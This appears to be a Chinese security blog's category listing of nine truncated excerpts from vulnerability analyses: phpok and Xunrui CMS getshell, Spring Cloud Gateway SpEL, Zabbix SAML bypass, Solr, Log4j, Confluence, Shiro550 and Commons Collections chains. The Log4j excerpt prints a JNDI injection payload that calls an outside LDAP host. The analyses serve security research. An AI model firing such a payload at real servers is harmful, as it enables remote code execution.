分类: vuln

9 篇文章

phpok 前台写shell
刚刚看了suanve师傅发的phpok https://susec.me/2022/03/13/phpok6-0-%E5%89%8D%E5%8F%B0%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9Egetshell/ 看了一下发现不用反序列化也能直接写文件 废话不多说直接看login_co…
spring-cloud-gateway_spel_CVE-2022-22947
1.ssrf https://wya.pl/2021/12/20/bring-your-own-ssrf-the-gateway-actuator/ 2.spel https://wya.pl/2022/02/26/cve-2022-22947-spel-casting-and-evil-beans/ 影响版本: 3.1.0 3.0.0 to 3.…
zabbix_CVE-2022-23131_saml-sso鉴权绕过
CVE-2022-23131 环境搭建: zabbix5.4的虚拟机: https://cdn.zabbix.com/zabbix/appliances/stable/5.4/5.4.8/zabbix_appliance-5.4.8-vmx.tar.gz 配置saml sso登录: https://www.bookstack.cn/read/zab…
记一次失败的CVE-2021-44548分析
CVE-2021-44548 之前在zsxq看到有师傅发solr的洞,今天看了一下,但是好像危害不大,不过还是学习为主看一波 https://solr.apache.org/security.html#cve-2021-44548-apache-solr-information-disclosure-vulnerability-through-da…
log4j rce
log4j rce 影响版本: 2.0-beta9 到 2.14.1 修复版本: 2.15.0-rc2 payload: ${jndi:ldap://9zx4xu.dnslog.cn:1389/Exp} 分析: 先来看原来没修的 2.14.1 import org.apache.logging.log4j.LogManager; import or…
Confluence 漏洞分析
CVE-2019-3396 https://jira.atlassian.com/browse/CONFSERVER-57974 影响版本为: version < 6.6.12 6.7.0 <= version < 6.12.3 6.13.0 <= version < 6.13.3 6.14.0 <= versi…
讯睿cms前台getshell
目录结构,index.php包含Fcms\init.php做入口,核心controller代码在dayrui中 路由为?s=控制器文件夹&c=具体控制器&m=方法,如?s=member&c=login&s=index 直接到漏洞函数,首先通过get传入app name module参数 这里进入294行的else中,…
shiro550反序列化分析踩坑
环境搭建 github上下载源码,配上tomcat运行shiro-web shiro-root pom.xml <dependency> <groupId>javax.servlet</groupId> <artifactId>jstl</artifactId> <!-- 这里需要将…
cc链1-8分析
URLDNS 先看波poc package ysoserial; import java.io.FileInputStream; import java.io.FileOutputStream; import java.io.ObjectInputStream; import java.io.ObjectOutputStream; import j…